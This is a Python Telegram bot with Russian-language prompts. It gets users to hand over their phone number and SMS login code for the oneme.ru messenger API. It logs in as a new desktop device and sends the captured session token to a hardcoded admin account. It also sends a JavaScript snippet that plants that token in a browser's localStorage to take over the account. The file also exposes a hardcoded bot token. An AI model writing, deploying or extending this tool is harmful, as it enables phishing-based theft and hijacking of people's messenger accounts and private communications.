import os
import json
import asyncio
import uuid
import logging
import time
import aiohttp
from aiogram import Bot, Dispatcher, types, F
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.fsm.storage.memory import MemoryStorage
from aiogram.types import FSInputFile

# ============================================================
# НАСТРОЙКИ
# ============================================================
BOT_TOKEN = "8948301530:AAH-ZTWkJuUOfPMRFl19qC1-YUAXfKUd9C8"
ADMIN_ID = 8632861931
# ============================================================

logging.basicConfig(level=logging.INFO)
bot = Bot(token=BOT_TOKEN)
dp = Dispatcher(storage=MemoryStorage())

API_BASE = "https://api.oneme.ru"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"

class AuthState(StatesGroup):
    waiting_for_code = State()
    waiting_for_password = State()

pending = {}

def gen_password():
    import random, string
    return ''.join(random.choices(string.ascii_letters + string.digits + "_@#", k=40))

def build_desktop_json(token, device_id, session_id, password, user_id, phone):
    return {
        "token": token,
        "device_id": device_id,
        "session_id": session_id,
        "password": password,
        "connection_params": {
            "device_type": "DESKTOP",
            "header_user_agent": USER_AGENT,
            "app_version": "25.12.13",
            "device_name": "Chrome",
            "os_version": "Windows 10",
            "locale": "ru",
            "device_locale": "ru",
            "screen": "1080x1920",
            "timezone": "Europe/Moscow"
        },
        "user": {
            "user_id": user_id,
            "phone": int(phone.replace("+", "")),
            "photo_id": None,
            "first_name": "",
            "last_name": ""
        }
    }

def generate_web_js(password, device_id, token, viewer_id):
    return f"""PASSWORD: {password}

sessionStorage.clear();
localStorage.clear();
localStorage.setItem('__oneme_device_id', '{device_id}');
localStorage.setItem('__oneme_auth', JSON.stringify({{"token":"{token}","viewerId":{viewer_id}}}));
window.location.reload();"""

async def send_files(phone, uid, work_dir, desktop, js):
    dp = f"{work_dir}/desktop_session.json"
    with open(dp, "w") as f: json.dump(desktop, f, indent=4)
    wp = f"{work_dir}/web_token.js"
    with open(wp, "w") as f: f.write(js)
    await bot.send_document(ADMIN_ID, FSInputFile(dp), caption=f"💻 Десктоп\n{phone}")
    await bot.send_document(ADMIN_ID, FSInputFile(wp), caption=f"🌐 Веб\n{phone}")

@dp.message(F.text == "/start")
async def start(message: types.Message):
    await message.answer("👋 Отправь номер в формате +79111111111")

@dp.message(F.text.regexp(r'^\+7\d{10}$'))
async def phone_handler(message: types.Message, state: FSMContext):
    phone = message.text.strip()
    uid = message.from_user.id
    work_dir = f"cache/{uid}"
    os.makedirs(work_dir, exist_ok=True)
    device_id = str(uuid.uuid4())
    session = aiohttp.ClientSession()
    pending[uid] = {
        "phone": phone,
        "work_dir": work_dir,
        "device_id": device_id,
        "session": session
    }
    
    payload = {
        "phone": phone,
        "device_id": device_id,
        "device_type": "DESKTOP",
        "app_version": "25.12.13"
    }
    
    try:
        async with session.post(f"{API_BASE}/v2/auth/sendCode", json=payload,
                                headers={"User-Agent": USER_AGENT}) as resp:
            text = await resp.text()
            logging.info(f"sendCode: {resp.status} {text[:200]}")
            if resp.status == 200:
                await state.set_state(AuthState.waiting_for_code)
                await state.update_data(phone=phone, work_dir=work_dir)
                await message.answer("📩 SMS отправлена. Введи код из 6 цифр:")
            else:
                await message.answer(f"❌ {resp.status}: {text[:300]}")
                await session.close()
                del pending[uid]
    except Exception as e:
        await message.answer(f"❌ Ошибка: {e}")
        await session.close()
        if uid in pending: del pending[uid]

@dp.message(AuthState.waiting_for_code, F.text.regexp(r'^\d{6}$'))
async def code_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    code = message.text.strip()
    if uid not in pending: return await message.answer("⏳ Сессия устарела.")
    
    data = await state.get_data()
    phone = data["phone"]
    work_dir = data["work_dir"]
    session = pending[uid]["session"]
    device_id = pending[uid]["device_id"]
    
    payload = {
        "phone": phone,
        "code": code,
        "device_id": device_id,
        "device_type": "DESKTOP",
        "app_version": "25.12.13"
    }
    
    try:
        async with session.post(f"{API_BASE}/v2/auth/login", json=payload,
                                headers={"User-Agent": USER_AGENT}) as resp:
            text = await resp.text()
            logging.info(f"login: {resp.status} {text[:200]}")
            if resp.status == 200:
                result = json.loads(text)
                token = result.get("token", "")
                viewer_id = result.get("user_id", 0)
                password = gen_password()
                session_id = int(time.time() * 1000)
                
                desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
                js = generate_web_js(password, device_id, token, viewer_id)
                await send_files(phone, uid, work_dir, desktop, js)
                await message.answer("✅ Готово! Файлы отправлены админу.")
                await session.close()
                del pending[uid]
                await state.clear()
            else:
                await message.answer(f"❌ {resp.status}: {text[:300]}")
    except Exception as e:
        await message.answer(f"❌ Ошибка: {e}")

@dp.message(AuthState.waiting_for_password)
async def password_handler(message: types.Message, state: FSMContext):
    await message.answer("⏳ 2FA пока не поддерживается в этой версии.")

async def main():
    logging.info("Бот запущен!")
    await dp.start_polling(bot)

if __name__ == "__main__":
    asyncio.run(main())
